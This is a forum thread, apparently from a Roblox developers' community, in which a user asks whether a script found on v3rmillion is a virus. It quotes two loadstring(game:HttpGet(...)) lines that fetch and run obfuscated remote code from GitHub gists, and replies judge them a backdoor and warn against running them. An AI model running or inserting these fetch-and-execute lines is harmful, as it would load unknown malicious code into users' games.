Is the script a virus?!

WARNING: This script may contain harmful code and I am not responsible for any damage if you use it.

Ok so if you guys have seen my previous posts I’ve been trying to patch dex in my game and I was on v3million looking for a script and this person said that this script is an anti core gui witch I know is false but is it a virus?

loadstring(game:HttpGet("https://gist.githubusercontent.com/ComoEsteban/77ad09c3904437f2386c7dc9ae9b1046/raw/"))()

and

loadstring(game:HttpGet("https://gist.githubusercontent.com/ComoEsteban/69a9f6b3de99308dcfb026aef3c294df/raw/"))()

Because its loadstring and if you have loadstring enabled it lets people get access to your game.

What do you think?

Thanks for all your responses and I have concluded this script is a type of a backdoor or SS into your game, Never put this script into your game, and never did I at 1 point put it into mine. Backdoor can’t only control your game but make changes to your game: People have gotten banned because of the game’s name changing and having inappropriate pictures, models, and descriptions some have even been known to make account changes.

9 Likes

Let me know… what you think.

1 Like

This is definitely a some sort of a backdoor.

4 Likes

The Github website is a bunch of jumbled code as well… which makes it more suspicious.

2 Likes

This leads to a github gist. Haven’t found any gist of “ComoEsteban” that matches the urls it shows but the one I found seem to be obfuscated so it’s maybe some backdoor.

And the guy’s also inactive.

3 Likes

I suggest you remove the script and choose something else.

Hmmm, interesting. He’s probably on an alt.

2 Likes

I just read the first part of the malicious script and it likes like a backdoor that probably lag or ruin your game. If I were you, I would remove it

4 Likes

the method

HttpGet

is blocked for developers. It wouldn’t work as we dont have that level needed to execute that method.

4 Likes

First of all, why are you in v3rmillion in the first place??? You should know that is a dangerous website and it’s not trustable!

And why would you want a Anti Core GUI in the first place, it can allow exploiters to access your game and have Server Side Access which is very bad.
As @granday_electronics said, you shouldn’t run that code. Who knows what will it really do? If you don’t know what it does, I highly advice you to NOT run the code in the command bar.

2 Likes

Just taking a tiny peak and not even analyzing it, Yeah it’s definitely some sort of a virus or backdoor.

is called “anti” for a reason. So they CANT get access.

1 Like

Yep it is, hm, there’s swear words on the link OOAOAOAOA

yeah hm I WOULD be careful because some users in the past got banned for swear words in scripts, so yeah.

4 Likes

Seems malicious, I would not use it.

1 Like

It is a virus, infact its actually an exploit script. game:HttpGet is a function that only exploit executors can use.

1 Like

As other have already pointed out, DO NOT run that code. Especially any scripts from v3rmillion that lead to 3rd party websites/any obfuscated code. V3rmillion is already as sketchy as it is, that could do something harmful.

2 Likes

What’s wrong with being on the website developers are on the website.

4 Likes

I am almost 100% sure that is some sort of evil backdoor. Loadstring is sus enough but then the source of the code is obfuscated!?! Don’t put this in your game. Also what are you doing on v3rmillion isn’t that were most exploits are sourced?

IN CASE THIS WASN’T CLEAR ENOUGH DO NOT RUN THIS CODE PERIOD END OF DISCUSSION NO QUESTIONS ASKED!!!

2 Likes

Devs can also use it to patch exploits.

2 Likes

Re-read what I said please and thank you.

2 Likes